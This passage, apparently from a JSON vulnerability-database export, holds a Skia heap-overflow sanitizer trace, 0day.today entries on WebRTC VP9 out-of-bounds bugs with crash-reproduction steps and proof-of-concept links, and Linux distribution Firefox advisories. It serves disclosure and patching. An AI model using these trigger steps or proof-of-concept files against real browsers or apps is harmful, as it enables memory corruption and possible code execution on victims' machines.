walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:261:30\r\n #7 0xd1b364 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:471:9\r\n #8 0xd1e625 in SkScan::FillPath(SkPath const&, SkRegion const&, SkBlitter*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:656:9\r\n #9 0xd0c39a in SkScan::FillPath(SkPath const&, SkRasterClip const&, SkBlitter*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_AntiPath.cpp:827:9\r\n #10 0xb9ae3d in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1024:9\r\n #11 0xb9c046 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1141:11\r\n #12 0x164e60a in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:15\r\n #13 0x164e60a in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:411\r\n #14 0xb44c54 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2145:23\r\n #15 0xb3bf59 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1708:11\r\n #16 0x86021e in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:37:11\r\n #17 0x7fd0eb3672b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #18 0x770659 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x770659)\r\n \r\n0x6140000021d0 is located 0 bytes to the right of 400-byte region [0x614000002040,0x6140000021d0)\r\nallocated by thread T0 here:\r\n #0 0x825b20 in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x825b20)\r\n #1 0xdf1d74 in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/ports/SkMemory_malloc.cpp:69:13\r\n #2 0x1671202 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/SkMalloc.h:59:12\r\n #3 0x1671202 in SkARGB32_Shader_Blitter::SkARGB32_Shader_Blitter(SkPixmap const&, SkPaint const&, SkShaderBase::Context*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:336\r\n #4 0x16643f9 in SkARGB32_Shader_Blitter* SkArenaAlloc::make<SkARGB32_Shader_Blitter, SkPixmap const&, SkPaint const&, SkShaderBase::Context*&>(SkPixmap const&, SkPaint const&, SkShaderBase::Context*&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkArenaAlloc.h:103:30\r\n #5 0x1663681 in SkBlitter::Choose(SkPixmap const&, SkMatrix const&, SkPaint const&, SkArenaAlloc*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter.cpp:1119:34\r\n #6 0xb9b4fe in SkAutoBlitterChoose::choose(SkDraw const&, SkMatrix const*, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkAutoBlitterChoose.h:36:20\r\n #7 0xb9aa59 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:966:34\r\n #8 0xb9c046 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1141:11\r\n #9 0x164e60a in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:15\r\n #10 0x164e60a in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:411\r\n #11 0xb44c54 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2145:23\r\n #12 0xb3bf59 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1708:11\r\n #13 0x86021e in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:37:11\r\n #14 0x7fd0eb3672b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fGradientPriv.h:73:18 in (anonymous namespace)::DstTraits<unsigned int, ((anonymous namespace)::ApplyPremul)0>::store((anonymous namespace)::SkNx<4, float> const&, unsigned int*, (anonymous namespace)::SkNx<4, float> const&)\r\nShadow bytes around the buggy address:\r\n 0x0c287fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c287fff83f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c287fff8400: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x0c287fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c287fff8420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c287fff8430: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa\r\n 0x0c287fff8440: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x0c287fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c287fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c287fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c287fff8480: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==18863==ABORTING\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45098.zip\n\n# 0day.today [2018-07-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30792"}, {"lastseen": "2018-06-10T01:34:55", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2018-06-09T00:00:00", "published": "2018-06-09T00:00:00", "id": "1337DAY-ID-30557", "href": "https://0day.today/exploit/description/30557", "title": "WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access Exploit", "type": "zdt", "sourceData": "There is a missing check in VP9 frame processing that could lead to memory corruption.\r\n \r\nIn the file video_coding/rtp_frame_reference_finder.cc, the function RtpFrameReferenceFinder::MissingRequiredFrameVp9 contains the following code:\r\n \r\n size_t temporal_idx = info.gof->temporal_idx[gof_idx];\r\n ...\r\n for (size_t l = 0; l < temporal_idx; ++l) {\r\n ...\r\n auto missing_frame_it = missing_frames_for_layer_[l].lower_bound(ref_pid);\r\n \r\nmissing_frames_for_layer_ is a std::array of length kMaxTemporalLayers which equals 5.\r\n \r\nMeanwhile, values in the temporal_idx array are read in rtp_format_vp9.cc in the following code:\r\n \r\n RETURN_FALSE_ON_ERROR(parser->ReadBits(&t, 3));\r\n ...\r\n vp9->gof.temporal_idx[i] = t;\r\n \r\nReading three bits makes the maximum size of temporal_idx 7, which can go out of bounds of the missing_frames_for_layer_ array.\r\n \r\nThis issue causes a crash in Chrome. To reproduce the issue.\r\n \r\n1) unzip the attached webrtc-from-chat.zip on a local webserver\r\n2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace src/modules/rtp_rtcp/source/rtp_format_vp9.cc with the version attached to the code\r\n3) build webrtc, including the examples\r\n4) run the attached webrtcserver.py with python 3.6 or higher\r\n5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to\r\n6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome\r\n7) Enter any username and hit \"Log in\"\r\n8) Type anything into the chat window at the bottom and hit send\r\n \r\nThe attached file 'missingframe' contains the VP9 frame that causes this crash.\r\n \r\nThough the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.\r\n \r\nThis issue affects any browser that supports VP9, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP9, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44863.zip\n\n# 0day.today [2018-06-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30557"}, {"lastseen": "2018-06-10T01:35:10", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2018-06-09T00:00:00", "published": "2018-06-09T00:00:00", "id": "1337DAY-ID-30558", "href": "https://0day.today/exploit/description/30558", "title": "WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access Exploit", "type": "zdt", "sourceData": "There is a missing check in VP9 frame processing that could lead to memory corruption.\r\n \r\nIn the file video_coding/rtp_frame_reference_finder.cc, the function RtpFrameReferenceFinder::ManageFrameVp9 fetches the GofInfo based on a pic_idx parsed from the incoming packet header. If the incoming frame is of type kVideoFrameKey, find is called on an iterator and the result is used without checking whether the it succeeds.\r\n \r\n if (frame->frame_type() == kVideoFrameKey) {\r\n ...\r\n GofInfo info = gof_info_.find(codec_header.tl0_pic_idx)->second;\r\n FrameReceivedVp9(frame->id.picture_id, &info);\r\n UnwrapPictureIds(frame);\r\n return kHandOff;\r\n }\r\n \r\nThis can cause a pointer to memory outside the gof_info_ map to be passed to FrameReceivedVp9. This function both reads and writes the info structure.\r\n \r\nThis issue does not crash reliably, so I recommend reproducing it using an asan build of Chrome. To reproduce the issue:\r\n \r\n1) unzip the attached webrtc-from-chat.zip on a local webserver\r\n2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace src/modules/rtp_rtcp/source/rtp_format_vp9.cc with the version attached to the code\r\n3) build webrtc, including the examples\r\n4) run the attached webrtcserver.py with python 3.6 or higher\r\n5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to\r\n6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome\r\n7) Enter any username and hit \"Log in\"\r\n8) Type anything into the chat window at the bottom and hit send\r\n \r\nChrome should crash in a few seconds.\r\n \r\nThough the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.\r\n \r\nThis issue affects any browser that supports VP9, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP9, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.\r\n \r\nI recommend fixing this by changing the above code to:\r\n \r\n auto gof_info_it = gof_info_.find(codec_header.tl0_pic_idx);\r\n if (gof_info_it == gof_info_.end())\r\n return kDrop;\r\n GofInfo info = gof_info_it->second;\r\n FrameReceivedVp9(frame->id.picture_id, &info);\r\n \r\nI have verified that this fix would prevent the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44862.zip\n\n# 0day.today [2018-06-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30558"}], "ubuntu": [{"lastseen": "2019-05-29T19:21:30", "bulletinFamily": "unix", "description": "A heap buffer overflow was discovered in Skia. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service, or execute arbitrary code.", "modified": "2018-06-12T00:00:00", "published": "2018-06-12T00:00:00", "id": "USN-3682-1", "href": "https://usn.ubuntu.com/3682-1/", "title": "Firefox vulnerability", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-05-29T18:33:53", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2018:2113\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.1.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and Firefox ESR 52.9 (CVE-2018-5188)\n\n* Mozilla: Buffer overflow using computed size of canvas element (CVE-2018-12359)\n\n* Mozilla: Use-after-free using focus() (CVE-2018-12360)\n\n* Mozilla: Media recorder segmentation fault when track type is changed during capture (CVE-2018-5156)\n\n* Skia: Heap buffer overflow rasterizing paths in SVG (CVE-2018-6126)\n\n* Mozilla: Integer overflow in SSSE3 scaler (CVE-2018-12362)\n\n* Mozilla: Use-after-free when appending DOM nodes (CVE-2018-12363)\n\n* Mozilla: CSRF attacks through 307 redirects and NPAPI plugins (CVE-2018-12364)\n\n* Mozilla: address bar username and password spoofing in reader mode (CVE-2017-7762)\n\n* Mozilla: Compromised IPC child process can list local filenames (CVE-2018-12365)\n\n* Mozilla: Invalid data handling during QCMS transformations (CVE-2018-12366)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Alex Gaynor, Christoph Diehl, Christian Holler, Jason Kratzer, David Major, Jon Coppeard, Nicolas B. Pierron, Marcia Knous, Ronald Crane, Nils, F. Alonso (revskills), David Black, and OSS-Fuzz as the original reporters.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-July/022960.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "modified": "2018-07-11T23:01:41", "published": "2018-07-11T23:01:41", "id": "CESA-2018:2113", "href": "http://lists.centos.org/pipermail/centos-announce/2018-July/022960.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:52", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2018:2112\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.1.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and Firefox ESR 52.9 (CVE-2018-5188)\n\n* Mozilla: Buffer overflow using computed size of canvas element (CVE-2018-12359)\n\n* Mozilla: Use-after-free using focus() (CVE-2018-12360)\n\n* Mozilla: Media recorder segmentation fault when track type is changed during capture (CVE-2018-5156)\n\n* Skia: Heap buffer overflow rasterizing paths in SVG (CVE-2018-6126)\n\n* Mozilla: Integer overflow in SSSE3 scaler (CVE-2018-12362)\n\n* Mozilla: Use-after-free when appending DOM nodes (CVE-2018-12363)\n\n* Mozilla: CSRF attacks through 307 redirects and NPAPI plugins (CVE-2018-12364)\n\n* Mozilla: address bar username and password spoofing in reader mode (CVE-2017-7762)\n\n* Mozilla: Compromised IPC child process can list local filenames (CVE-2018-12365)\n\n* Mozilla: Invalid data handling during QCMS transformations (CVE-2018-12366)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Alex Gaynor, Christoph Diehl, Christian Holler, Jason Kratzer, David Major, Jon Coppeard, Nicolas B. Pierron, Marcia Knous, Ronald Crane, Nils, F. Alonso (revskills), David Black, and OSS-Fuzz as the original reporters.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-July/022961.html\nhttp://lists.centos.org/pipermail/centos-announce/2018-July/022962.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "modified": "2018-07-13T16:55:34", "published": "2018-07-12T20:46:19", "id": "CESA-2018:2112", "href": "http://lists.centos.org/pipermail/centos-announce/2018-July/022961.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "unix", "description": "[60.1.0-4.0.1]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n[60.1.0-4]\n- Disabled jemalloc on all second arches\n[60.1.0-3]\n- Updated to 60.1.0 ESR build2\n[60.1.0-2]\n- Disabled jemalloc on second arches\n[60.1.0-1]\n- Updated to 60.1.0 ESR\n[60.0-12]\n- Fixing bundled libffi issues\n- Readded some requirements\n[60.0-10]\n- Added fix for mozilla BZ#1436242 - IPC crashes.\n[60.0-9]\n- Bundling libffi for the sec-arches\n- Added openssl-devel for the Python\n- Fixing bundled gtk3\n[60.0-8]\n- Added fix for mozilla BZ#1458492\n[60.0-7]\n- Added patch from rhbz#1498561 to fix ppc64(le) crashes.\n[60.0-6]\n- Disabled jemalloc on second arches\n[60.0-4]\n- Update to 60.0 ESR\n[52.7.0-1]\n- Update to 52.7.0 ESR\n[52.6.0-2]\n- Build Firefox for desktop arches only (x86_64 and ppc64le)\n[52.6.0-1]\n- Update to 52.6.0 ESR\n[52.5.0-1]\n- Update to 52.5.0 ESR\n[52.4.0-1]\n- Update to 52.4.0 ESR\n[52.3.0-3]\n- Update to 52.3.0 ESR (b2)\n- Require correct nss version\n[52.2.0-1]\n- Update to 52.2.0 ESR\n[52.1.2-1]\n- Update to 52.1.2 ESR\n[52.0-7]\n- Added fix for accept language (rhbz#1454322)\n[52.0-6]\n- Removing patch required for older NSS from RHEL 7.3\n- Added patch for rhbz#1414564\n[52.0-5]\n- Added fix for mozbz#1348168/CVE-2017-5428\n[52.0-4]\n- Update to 52.0 ESR (b4)\n[52.0-3]\n- Added fix for rhbz#1423012 - ppc64 gfx crashes\n[52.0-2]\n- Enable system nss\n[52.0-1]\n- Update to 52.0ESR (B1)\n- Build RHEL7 package for Gtk3\n[52.0-0.13]\n- Added fix for rhbz#1414535\n[52.0-0.12]\n- Update to 52.0b8\n[52.0-0.11]\n- Readded addons patch\n[52.0-0.10]\n- Update to 52.0b3\n[52.0-0.9]\n- Update to 52.0b2\n[52.0-0.8]\n- Update to 52.0b1\n[52.0-0.5]\n- Firefox Aurora 52 testing build", "modified": "2018-07-04T00:00:00", "published": "2018-07-04T00:00:00", "id": "ELSA-2018-2113", "href": "http://linux.oracle.com/errata/ELSA-2018-2113.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-10-03T01:53:55", "bulletinFamily": "unix", "description": "### Background\n\nMozilla Firefox is a popular open-source web browser from the Mozilla Project. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker could entice a user to view a specially crafted web page, possibly resulting in the execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, spoof the address bar, conduct clickjacking attacks, bypass security restrictions and protection mechanisms, or have other unspecified impact. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-60.2.2\"\n \n\nAll Mozilla Firefox binary users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-60.2.2\"", "modified": "2018-10-02T00:00:00", "published": "2018-10-02T00:00:00", "id": "GLSA-201810-01", "href": "https://security.gentoo.org/glsa/201810-01", "title": "Mozilla Firefox: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}